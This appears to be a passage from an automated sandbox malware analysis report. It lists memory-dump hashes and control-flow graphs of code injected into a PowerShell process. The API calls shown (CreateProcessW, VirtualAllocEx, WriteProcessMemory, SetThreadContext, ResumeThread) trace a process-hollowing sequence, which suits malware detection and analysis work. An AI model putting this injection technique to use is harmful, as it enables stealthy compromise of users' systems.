                                            • Snapshot File: hcaresult_6_2_1dd000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 816c7c512b608b6fcad81d4754d364b6cade5c2ac4ba80116c47b794cfad9ac3
                                            • Instruction ID: 2a0aaed5be7078395fd73516134c33993800963f323f1b6f2a347083bdf77298
                                            • Opcode Fuzzy Hash: 816c7c512b608b6fcad81d4754d364b6cade5c2ac4ba80116c47b794cfad9ac3
                                            • Instruction Fuzzy Hash: 54018471504340AAE7144A15DC84B67BB98DFC1724F18C556EC495B282C3799945CAB1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.569344168.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_1dd000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 79f023b7b80c73bfe361b94ba4c009a78bd8953642823e181424660c34bcdff4
                                            • Instruction ID: e631fd7b23e245d5777e48e0fedf3e872c9ee418420c19ef6fec9afaaa456130
                                            • Opcode Fuzzy Hash: 79f023b7b80c73bfe361b94ba4c009a78bd8953642823e181424660c34bcdff4
                                            • Instruction Fuzzy Hash: FE019E6150E3C09FE7128B259C94B52BFB4DF52224F19C1CBE8888F2A3C2689C49C772

                                            Execution Graph

                                            Execution Coverage:11.4%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:0%
                                            Total number of Nodes:61
                                            Total number of Limit Nodes:6
                                            execution_graph 11715 3192a2 11717 3192aa 11715->11717 11718 3191cf 11717->11718 11719 319266 11718->11719 11722 3192e6 11718->11722 11720 3192d6 11723 319317 11722->11723 11724 31932c 11723->11724 11726 319347 11723->11726 11748 3192e6 8 API calls 11723->11748 11749 319360 11723->11749 11724->11720 11737 31989b 11726->11737 11772 3187e4 11726->11772 11727 319b1d CreateProcessW 11730 319b91 11727->11730 11728 31946c 11729 3187f0 Wow64SetThreadContext 11728->11729 11728->11737 11732 3194ca 11729->11732 11731 3198b1 11731->11720 11733 3195b9 VirtualAllocEx 11732->11733 11732->11737 11734 319606 11733->11734 11735 319631 VirtualAllocEx 11734->11735 11736 319685 11734->11736 11735->11736 11736->11737 11738 318808 WriteProcessMemory 11736->11738 11737->11727 11737->11731 11742 3196c2 11738->11742 11739 3197d0 11739->11737 11740 318808 WriteProcessMemory 11739->11740 11741 3197f9 11740->11741 11741->11737 11743 318814 Wow64SetThreadContext 11741->11743 11742->11737 11742->11739 11746 318808 WriteProcessMemory 11742->11746 11744 319857 11743->11744 11744->11737 11745 31985b ResumeThread 11744->11745 11745->11737 11746->11742 11748->11723 11750 3193d9 11749->11750 11751 3187e4 CreateProcessW 11750->11751 11754 31989b 11750->11754 11753 31946c 11751->11753 11752 319b1d CreateProcessW 11756 319b91 11752->11756 11753->11754 11776 3187f0 11753->11776 11754->11752 11758 3198b1 11754->11758 11757 3194ca 11757->11754 11759 3195b9 VirtualAllocEx 11757->11759 11758->11723 11760 319606 11759->11760 11761 319631 VirtualAllocEx 11760->11761 11762 319685 11760->11762 11761->11762 11762->11754 11780 318808 11762->11780 11764 3197d0 11764->11754 11766 318808 WriteProcessMemory 11764->11766 11765 3196c2 11765->11754 11765->11764 11771 318808 WriteProcessMemory 11765->11771 11767 3197f9 11766->11767 11767->11754 11784 318814 11767->11784 11770 31985b ResumeThread 11770->11754 11771->11765 11773 319a38 CreateProcessW 11772->11773 11775 319b91 11773->11775 11777 319c78 Wow64SetThreadContext 11776->11777 11779 319cf2 11777->11779 11779->11757 11781 319df0 WriteProcessMemory 11780->11781 11783 319e7b 11781->11783 11783->11765 11785 319c78 Wow64SetThreadContext 11784->11785 11787 319857 11785->11787 11787->11754 11787->11770

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 724 312c88-312cab 725 312cad-312cb6 724->725 726 312ccc 724->726 728 312cb8-312cbb 725->728 729 312cbd-312cc0 725->729 727 312ccf-312d00 726->727 732 312d02-312d0b 727->732 733 312d74-312d9e 727->733 730 312cca 728->730 729->730 730->727 732->733 734 312d0d-312d13 732->734 740 312da4-312dad 733->740 741 312e59-312ed6 733->741 735 312d19-312d26 734->735 736 312f5c-312f75 734->736 738 312d28-312d4c 735->738 739 312d6b-312d72 735->739 744 312f77-312faa 736->744 745 312fac-312fb3 736->745 759 312d67 738->759 760 312d4e-312d51 738->760 739->733 739->734 740->736 743 312db3-312de2 740->743 809 312ef0-312f03 741->809 810 312ed8-312eee 741->810 762 312de4-312dfa 743->762 763 312dfc-312e0f 743->763 744->745 748 312ff0 744->748 749 312fb5-312fc2 745->749 750 312fc4 745->750 752 312ff3-31302f 748->752 753 312fc6-312fc8 749->753 750->753 774 313031-31303a 752->774 775 3130ac-3130b7 752->775 757 312fca-312fcd 753->757 758 312fcf-312fd1 753->758 766 312fee 757->766 767 312fd3-312fe0 758->767 768 312fe2 758->768 759->739 769 312d53-312d56 760->769 770 312d5d-312d66 760->770 771 312e11-312e18 762->771 763->771 766->752 773 312fe4-312fe6 767->773 768->773 769->770 776 312e1a-312e2b 771->776 777 312e3d 771->777 773->766 774->775 780 31303c-313042 774->780 778 3130c6-3130e8 775->778 779 3130b9-3130bc 775->779 776->777 791 312e2d-312e36 776->791 777->741 792 3131aa-3131f8 778->792 793 3130ee-3130f7 778->793 779->778 783 3132e2-313339 780->783 784 313048-313055 780->784 799 313370-31339b 783->799 800 31333b-31334e 783->800 787 3130a3-3130aa 784->787 788 313057-313082 784->788 787->775 787->780 803 313084-313087 788->803 804 31309f 788->804 791->777 828 3131fb-313231 792->828 793->783 794 3130fd-313133 793->794 816 313135-31314b 794->816 817 31314d-313160 794->817 800->799 807 313093-31309c 803->807 808 313089-31308c 803->808 804->787 808->807 813 312f05-312f0c 809->813 810->813 819 312f1b 813->819 820 312f0e-312f14 813->820 818 313162-313169 816->818 817->818 821 31316b-31317c 818->821 822 31318e-3131a4 818->822 819->736 820->819 821->822 827 31317e-313187 821->827 822->792 822->793 827->822 832 313239-31324f call 8b14b8 828->832 833 313251-31325a 832->833 834 313274-313287 833->834 835 31325c-313272 833->835 836 313289-313290 834->836 835->836 837 313292-313298 836->837 838 31329f-3132a9 836->838 837->838 838->828
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.519940452.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_310000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dcd1b6c3cfc9d4f42dbe9fd3d76a488e9a2288c51080e3d049d24cdee11b1984
                                            • Instruction ID: 2102458b7e010d67071da6ea81ce9879f25cee7eaa6f5b5945f883e5b44d8a48
                                            • Opcode Fuzzy Hash: dcd1b6c3cfc9d4f42dbe9fd3d76a488e9a2288c51080e3d049d24cdee11b1984
                                            • Instruction Fuzzy Hash: 92224934A01248AFDB19DFA8D484ADEBBF2FF88314F258559E405AB351C771ED86CB90

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 319360-319411 4 319417-31941c 0->4 5 319a1c-319ab1 0->5 6 31942a 4->6 7 31941e-319428 4->7 10 319ab3-319ab6 5->10 11 319ab9-319ac0 5->11 9 31942f-319431 6->9 7->9 12 319433-319445 9->12 13 31944b-31946e call 3187e4 9->13 10->11 14 319ac2-319ac8 11->14 15 319acb-319ae1 11->15 12->13 21 3199a5-3199b8 13->21 22 319474-319489 13->22 14->15 18 319ae3-319ae9 15->18 19 319aec-319b8f CreateProcessW 15->19 18->19 25 319b91-319b97 19->25 26 319b98-319c10 19->26 35 3199bf-3199d5 21->35 28 3198b6 22->28 29 31948f-3194b3 22->29 25->26 52 319c22-319c29 26->52 53 319c12-319c18 26->53 33 3198bb-3198ce 28->33 29->35 41 3194b9-3194cc call 3187f0 29->41 49 3198d5-3198e8 33->49 35->5 47 3199d7-3199df 35->47 50 3194d2-3194dc 41->50 51 31998b-31999e 41->51 61 3199e1-3199e3 call 317b44 47->61 62 3199e8-3199f5 47->62 73 3198ef-319902 49->73 50->35 54 3194e2-3194ff 50->54 51->21 57 319c40 52->57 58 319c2b-319c3a 52->58 53->52 54->28 60 319505-31951f call 3187fc 54->60 64 319c41 57->64 58->57 70 319971-319984 60->70 71 319525-31952e 60->71 61->62 81 3199f7 62->81 82 3199fc-319a19 62->82 64->64 70->51 74 319530-319574 71->74 75 31958f-319595 71->75 91 319909-31991c 73->91 84 319576-31957c 74->84 85 31957d-319589 74->85 75->28 77 31959b-3195ab 75->77 77->28 89 3195b1-319604 VirtualAllocEx 77->89 81->82 84->85 85->75 88 319957-31996a 85->88 88->70 94 319606-31960c 89->94 95 31960d-31962f 89->95 110 319923-319936 91->110 94->95 96 319631-319683 VirtualAllocEx 95->96 97 31969c-3196a3 95->97 101 319685-31968b 96->101 102 31968c-319696 96->102 103 3196a9-3196c4 call 318808 97->103 104 31993d-319950 97->104 101->102 102->97 103->110 111 3196ca-3196d3 103->111 104->88 110->104 111->28 113 3196d9-3196df 111->113 113->28 115 3196e5-3196f0 113->115 115->28 118 3196f6-319700 115->118 119 3197d0-3197e1 118->119 120 319706-31970b 118->120 119->28 124 3197e7-3197fb call 318808 119->124 120->28 121 319711-319724 120->121 121->28 125 31972a-319739 121->125 124->73 128 319801-319807 124->128 125->28 131 31973f-31974f 125->131 128->28 130 31980d-31981e 128->130 134 319820-319823 130->134 135 319829-319831 130->135 136 319751-319754 131->136 137 3197b2-3197b5 131->137 134->135 135->28 138 319837-319841 135->138 136->28 140 31975a-31975d 136->140 137->28 139 3197bb-3197be 137->139 138->35 141 319847-319859 call 318814 138->141 139->28 142 3197c4-3197ca 139->142 140->28 143 319763-319791 140->143 141->49 147 31985b-319899 ResumeThread 141->147 142->119 142->120 143->28 151 319797-3197a5 call 318808 143->151 149 3198a2-3198af 147->149 150 31989b-3198a1 147->150 149->33 152 3198b1 149->152 150->149 155 3197aa-3197ac 151->155 152->81 155->91 155->137
                                            APIs
                                            • VirtualAllocEx.KERNEL32(?,?,00000000,00003000,00000040), ref: 003195ED
                                            • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 0031966C
                                            • ResumeThread.KERNELBASE(?), ref: 00319882
                                            • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00319B7C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.519940452.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_310000_powershell.jbxd
                                            Similarity
                                            • API ID: AllocVirtual$CreateProcessResumeThread
                                            • String ID: lX
                                            • API String ID: 1213262536-2093460002
                                            • Opcode ID: d3fea46975d9b446e563341c4808f9296500bf5e6be3e0d54c39109c64961a63
                                            • Instruction ID: 65d7b106288f4b5d640990ab9bbb3ec7d3ae5d24d289e64e1ff32ca9f156ba63
                                            • Opcode Fuzzy Hash: d3fea46975d9b446e563341c4808f9296500bf5e6be3e0d54c39109c64961a63
                                            • Instruction Fuzzy Hash: D4326070A002188FDB29DF65C854BDDBBB2BF89304F1481AAD509AB391DB749EC5CF51

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 156 3192e6-319312 157 319317-319320 156->157 320 319322 call 319360 157->320 321 319322 call 3192e6 157->321 158 319328-31932a 159 319336-319339 158->159 160 31932c-319335 158->160 161 319347-319411 159->161 162 31933b-31933e 159->162 168 319417-31941c 161->168 169 319a1c-319ab1 161->169 162->157 163 319340-319346 162->163 170 31942a 168->170 171 31941e-319428 168->171 174 319ab3-319ab6 169->174 175 319ab9-319ac0 169->175 173 31942f-319431 170->173 171->173 176 319433-319445 173->176 177 31944b-31946e call 3187e4 173->177 174->175 178 319ac2-319ac8 175->178 179 319acb-319ae1 175->179 176->177 185 3199a5-3199b8 177->185 186 319474-319489 177->186 178->179 182 319ae3-319ae9 179->182 183 319aec-319b8f CreateProcessW 179->183 182->183 189 319b91-319b97 183->189 190 319b98-319c10 183->190 199 3199bf-3199d5 185->199 192 3198b6 186->192 193 31948f-3194b3 186->193 189->190 216 319c22-319c29 190->216 217 319c12-319c18 190->217 197 3198bb-3198ce 192->197 193->199 205 3194b9-3194cc call 3187f0 193->205 213 3198d5-3198e8 197->213 199->169 211 3199d7-3199df 199->211 214 3194d2-3194dc 205->214 215 31998b-31999e 205->215 225 3199e1-3199e3 call 317b44 211->225 226 3199e8-3199f5 211->226 237 3198ef-319902 213->237 214->199 218 3194e2-3194ff 214->218 215->185 221 319c40 216->221 222 319c2b-319c3a 216->222 217->216 218->192 224 319505-31951f call 3187fc 218->224 228 319c41 221->228 222->221 234 319971-319984 224->234 235 319525-31952e 224->235 225->226 245 3199f7 226->245 246 3199fc-319a19 226->246 228->228 234->215 238 319530-319574 235->238 239 31958f-319595 235->239 255 319909-31991c 237->255 248 319576-31957c 238->248 249 31957d-319589 238->249 239->192 241 31959b-3195ab 239->241 241->192 253 3195b1-319604 VirtualAllocEx 241->253 245->246 248->249 249->239 252 319957-31996a 249->252 252->234 258 319606-31960c 253->258 259 31960d-31962f 253->259 274 319923-319936 255->274 258->259 260 319631-319683 VirtualAllocEx 259->260 261 31969c-3196a3 259->261 265 319685-31968b 260->265 266 31968c-319696 260->266 267 3196a9-3196c4 call 318808 261->267 268 31993d-319950 261->268 265->266 266->261 267->274 275 3196ca-3196d3 267->275 268->252 274->268 275->192 277 3196d9-3196df 275->277 277->192 279 3196e5-3196f0 277->279 279->192 282 3196f6-319700 279->282 283 3197d0-3197e1 282->283 284 319706-31970b 282->284 283->192 288 3197e7-3197fb call 318808 283->288 284->192 285 319711-319724 284->285 285->192 289 31972a-319739 285->289 288->237 292 319801-319807 288->292 289->192 295 31973f-31974f 289->295 292->192 294 31980d-31981e 292->294 298 319820-319823 294->298 299 319829-319831 294->299 300 319751-319754 295->300 301 3197b2-3197b5 295->301 298->299 299->192 302 319837-319841 299->302 300->192 304 31975a-31975d 300->304 301->192 303 3197bb-3197be 301->303 302->199 305 319847-319859 call 318814 302->305 303->192 306 3197c4-3197ca 303->306 304->192 307 319763-319791 304->307 305->213 311 31985b-319899 ResumeThread 305->311 306->283 306->284 307->192 315 319797-3197a5 call 318808 307->315 313 3198a2-3198af 311->313 314 31989b-3198a1 311->314 313->197 316 3198b1 313->316 314->313 319 3197aa-3197ac 315->319 316->245 319->255 319->301 320->158 321->158
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.519940452.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_310000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: lX
                                            • API String ID: 0-2093460002
                                            • Opcode ID: 41f0a6ea24f5bc38ba0d5be08dfac55f78cb64b0a1c94789a71eba3942c02c2f
                                            • Instruction ID: 294b2c6df71d55526f6861f4380c9a1a7a13a38c52d40dac38cf24745170e07c
                                            • Opcode Fuzzy Hash: 41f0a6ea24f5bc38ba0d5be08dfac55f78cb64b0a1c94789a71eba3942c02c2f
                                            • Instruction Fuzzy Hash: 13F18170A042188FDB25CF25CC54BD9BBB2BF89314F2581AAD549AB392DB709DC4CF51

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 322 8b14b8-8b150c 327 8b1539-8b153e 322->327 328 8b150e-8b151c 322->328 327->328 331 8b1524-8b1533 328->331 331->327
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.520032653.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_8b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: l;]$l;]
                                            • API String ID: 0-951176615
                                            • Opcode ID: 4876ecd9df4989d43aa8272387e1e934cf4afe455a34845632dbd389324622f5
                                            • Instruction ID: a96540a544d67d9c64ed40ad4aebb4aacdcb93673861a656e2e1aeffcf1881ae
                                            • Opcode Fuzzy Hash: 4876ecd9df4989d43aa8272387e1e934cf4afe455a34845632dbd389324622f5
                                            • Instruction Fuzzy Hash: 28F0C87435020C67EB3826758815F7F29DAEBC8B41F50802AF5069F3C2DDB1DD818319

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 332 3187e4-319ab1 334 319ab3-319ab6 332->334 335 319ab9-319ac0 332->335 334->335 336 319ac2-319ac8 335->336 337 319acb-319ae1 335->337 336->337 338 319ae3-319ae9 337->338 339 319aec-319b8f CreateProcessW 337->339 338->339 341 319b91-319b97 339->341 342 319b98-319c10 339->342 341->342 349 319c22-319c29 342->349 350 319c12-319c18 342->350 351 319c40 349->351 352 319c2b-319c3a 349->352 350->349 353 319c41 351->353 352->351 353->353
                                            APIs
                                            • CreateProcessW.KERNEL32(00000000,?,00000009,?,?,?,?,?,?,?), ref: 00319B7C
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.519940452.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_310000_powershell.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 19e0726968c39f1c729ce6ac7551dedbe0ea482ded3772b1b9d57b74ac217818
                                            • Instruction ID: be7a35ef600600537b8bb87314ec415e51d8055ec11eaba47d399eaf36bd818e
                                            • Opcode Fuzzy Hash: 19e0726968c39f1c729ce6ac7551dedbe0ea482ded3772b1b9d57b74ac217818
                                            • Instruction Fuzzy Hash: D4512471901219DFEF29CF99C880BDDBBB5BF48304F1584AAE909B7250D7319A88CF90

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 355 319de9-319e36 357 319e40-319e79 WriteProcessMemory 355->357 358 319e38-319e3e 355->358 359 319e82-319ea3 357->359 360 319e7b-319e81 357->360 358->357 360->359
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,00000000,00000000,165B197F,00000000,?,?,?,00000000,00000000,?,003196C2,?,00000000,?), ref: 00319E6C
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.519940452.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_310000_powershell.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: d2fe501cac2d905cf7656594a6374369d786bb4ff0b9c9bd438f4e53e43adb22
                                            • Instruction ID: e76e13f14c7cc645f60ea25e01b87331c0978d6720a80927188558cc7ef37723
                                            • Opcode Fuzzy Hash: d2fe501cac2d905cf7656594a6374369d786bb4ff0b9c9bd438f4e53e43adb22
                                            • Instruction Fuzzy Hash: 2221C4B59003499FDB11CF9AC884BDEBBF4FF48310F55842AE958A7250D378AA44CFA5

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 362 318808-319e36 364 319e40-319e79 WriteProcessMemory 362->364 365 319e38-319e3e 362->365 366 319e82-319ea3 364->366 367 319e7b-319e81 364->367 365->364 367->366
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,00000000,00000000,165B197F,00000000,?,?,?,00000000,00000000,?,003196C2,?,00000000,?), ref: 00319E6C
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.519940452.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_310000_powershell.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: b8cfb895451a658fa5ba91cd6c2e4fba022d46a12a53ea62fc4caec4e61b2c50
                                            • Instruction ID: 932815296d7cb0fcc7466f007957bb3f1859e5c7b6a87704cc2476240cf85f19
                                            • Opcode Fuzzy Hash: b8cfb895451a658fa5ba91cd6c2e4fba022d46a12a53ea62fc4caec4e61b2c50
                                            • Instruction Fuzzy Hash: 4B21E7B1900349DFDB10CF9AD884BDEBBF4FB48310F51842AE918A7240D378AA54CFA5

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 376 318814-319cb8 378 319cc4-319cf0 Wow64SetThreadContext 376->378 379 319cba-319cc2 376->379 380 319cf2-319cf8 378->380 381 319cf9-319d1a 378->381 379->378 380->381
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,003194CA), ref: 00319CE3
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.519940452.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_310000_powershell.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: afa5aa302d9369a2ba697a4d8faf8d488948bf04b9915ec83154d940e0d140fe
                                            • Instruction ID: f4bd17357fc59055117ad3584c6fd202560f29a2b82e3f97a0c1a1084ec0d31d
                                            • Opcode Fuzzy Hash: afa5aa302d9369a2ba697a4d8faf8d488948bf04b9915ec83154d940e0d140fe
                                            • Instruction Fuzzy Hash: 3A1137B1D002498FDB10CF9AC884BDEFBF4EB88310F25842AD459A3340D378A945CFA5

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 369 3187f0-319cb8 371 319cc4-319cf0 Wow64SetThreadContext 369->371 372 319cba-319cc2 369->372 373 319cf2-319cf8 371->373 374 319cf9-319d1a 371->374 372->371 373->374
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,003194CA), ref: 00319CE3
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.519940452.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_310000_powershell.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 26fec37e09c7db8f04f80abbe186456ff70c73e6515b0d851265d7c53e637d08
                                            • Instruction ID: dc3362d3303efa3c4824dc24349fd64d49e26e69a7be59dc8074069dd07724bc
                                            • Opcode Fuzzy Hash: 26fec37e09c7db8f04f80abbe186456ff70c73e6515b0d851265d7c53e637d08
                                            • Instruction Fuzzy Hash: 031126B1D002498FDB10CF9AC884BDEBBF4EB88320F25842AD459A3640D378A945CFA5

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 383 319c71-319cb8 385 319cc4-319cf0 Wow64SetThreadContext 383->385 386 319cba-319cc2 383->386 387 319cf2-319cf8 385->387 388 319cf9-319d1a 385->388 386->385 387->388
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,003194CA), ref: 00319CE3
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.519940452.0000000000310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00310000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_310000_powershell.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 3f6865aefc95045129cc6be246ca2e1ac762e1225134a75ebab8f267f0684cbb
                                            • Instruction ID: f26e7e454ce409c1d30daf8db04a6d9509975cd03d36c849d3d618c5e8f44cc6
                                            • Opcode Fuzzy Hash: 3f6865aefc95045129cc6be246ca2e1ac762e1225134a75ebab8f267f0684cbb
                                            • Instruction Fuzzy Hash: E01126B1D002498FDB10CF9AC884BDEBBF4EB88310F15842AD458A7241D3789A45CFA5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.520032653.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_8b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1cfc382bb4a085c6712488a9fe3564064377e456c6c74d96b4d4b02e0c21341
                                            • Instruction ID: 6ecd56bb0c2347e2e6099622e6e88ab84f8e278842b9c47a6aa46ed356ae9bbc
                                            • Opcode Fuzzy Hash: e1cfc382bb4a085c6712488a9fe3564064377e456c6c74d96b4d4b02e0c21341
                                            • Instruction Fuzzy Hash: 4012CF30B042159FDB259F68C854BEABBA2FF95320F24807AD459CB361DB31DE46CB91

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1012 8b2358-8b2381 1013 8b25c9-8b25ff 1012->1013 1014 8b2387-8b238c 1012->1014 1022 8b260f 1013->1022 1023 8b2601-8b260d 1013->1023 1015 8b238e-8b2394 1014->1015 1016 8b23a4-8b23a8 1014->1016 1018 8b2398-8b23a2 1015->1018 1019 8b2396 1015->1019 1020 8b2579-8b2583 1016->1020 1021 8b23ae-8b23b0 1016->1021 1018->1016 1019->1016 1024 8b2591-8b2597 1020->1024 1025 8b2585-8b258e 1020->1025 1026 8b23b2-8b23be 1021->1026 1027 8b23c0 1021->1027 1029 8b2611-8b2613 1022->1029 1023->1029 1030 8b2599-8b259b 1024->1030 1031 8b259d-8b25a9 1024->1031 1028 8b23c2-8b23c4 1026->1028 1027->1028 1028->1020 1036 8b23ca-8b23e9 1028->1036 1033 8b2619-8b2631 1029->1033 1034 8b2702-8b270c 1029->1034 1035 8b25ab-8b25c6 1030->1035 1031->1035 1046 8b2637-8b263c 1033->1046 1047 8b2755-8b279c 1033->1047 1038 8b270e-8b2714 1034->1038 1039 8b2717-8b271d 1034->1039 1053 8b242b 1036->1053 1054 8b23eb-8b23fe 1036->1054 1042 8b271f-8b2721 1039->1042 1043 8b2723-8b272f 1039->1043 1045 8b2731-8b2752 1042->1045 1043->1045 1051 8b263e-8b2644 1046->1051 1052 8b2654-8b265e 1046->1052 1061 8b279e-8b27aa 1047->1061 1062 8b27ac 1047->1062 1057 8b2648-8b2652 1051->1057 1058 8b2646 1051->1058 1060 8b2663-8b2674 1052->1060 1059 8b242d-8b242f 1053->1059 1054->1013 1069 8b2404-8b2409 1054->1069 1057->1052 1058->1052 1059->1020 1066 8b2435-8b243f 1059->1066 1060->1047 1073 8b267a-8b267f 1060->1073 1067 8b27ae-8b27b0 1061->1067 1062->1067 1066->1013 1070 8b2445-8b244a 1066->1070 1071 8b286f-8b2879 1067->1071 1072 8b27b6-8b27b8 1067->1072 1074 8b240b-8b2411 1069->1074 1075 8b2421-8b2429 1069->1075 1076 8b244c-8b2452 1070->1076 1077 8b2462-8b2470 1070->1077 1078 8b287b-8b2884 1071->1078 1079 8b2887-8b288d 1071->1079 1080 8b27ba-8b27c0 1072->1080 1081 8b27d2-8b27db 1072->1081 1088 8b2681-8b2687 1073->1088 1089 8b2697-8b26ba 1073->1089 1090 8b2413 1074->1090 1091 8b2415-8b241f 1074->1091 1075->1059 1092 8b2456-8b2460 1076->1092 1093 8b2454 1076->1093 1077->1020 1100 8b2476-8b2493 1077->1100 1082 8b288f-8b2891 1079->1082 1083 8b2893-8b289f 1079->1083 1084 8b27c2 1080->1084 1085 8b27c4-8b27d0 1080->1085 1086 8b27df-8b27ee 1081->1086 1087 8b27dd 1081->1087 1094 8b28a1-8b28bd 1082->1094 1083->1094 1084->1081 1085->1081 1106 8b27fd-8b2843 1086->1106 1107 8b27f0-8b27fb 1086->1107 1087->1086 1096 8b268b-8b2695 1088->1096 1097 8b2689 1088->1097 1089->1047 1112 8b26c0-8b26c5 1089->1112 1090->1075 1091->1075 1092->1077 1093->1077 1096->1089 1097->1089 1100->1020 1120 8b2499-8b24be 1100->1120 1131 8b284f-8b2859 1106->1131 1132 8b2845 1106->1132 1111 8b2863-8b286c 1107->1111 1115 8b26dd-8b26ff 1112->1115 1116 8b26c7-8b26cd 1112->1116 1118 8b26cf 1116->1118 1119 8b26d1-8b26db 1116->1119 1118->1115 1119->1115 1120->1020 1129 8b24c4-8b24fb 1120->1129 1138 8b24fd-8b2503 1129->1138 1139 8b2515-8b251c 1129->1139 1134 8b285b 1131->1134 1135 8b284a 1131->1135 1132->1135 1134->1111 1135->1131 1140 8b2507-8b2513 1138->1140 1141 8b2505 1138->1141 1142 8b251e-8b2524 1139->1142 1143 8b2534-8b2576 1139->1143 1140->1139 1141->1139 1144 8b2528-8b2532 1142->1144 1145 8b2526 1142->1145 1144->1143 1145->1143
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.520032653.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_8b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4e58a620edd50abfda8ce6506ef6ad0bd8a4a98356d954513f17d8ece1e1abb3
                                            • Instruction ID: 62557eba6d36210a4d18a557ddc5cf23a2694d6f69df460d5abb9aed4caf23e5
                                            • Opcode Fuzzy Hash: 4e58a620edd50abfda8ce6506ef6ad0bd8a4a98356d954513f17d8ece1e1abb3
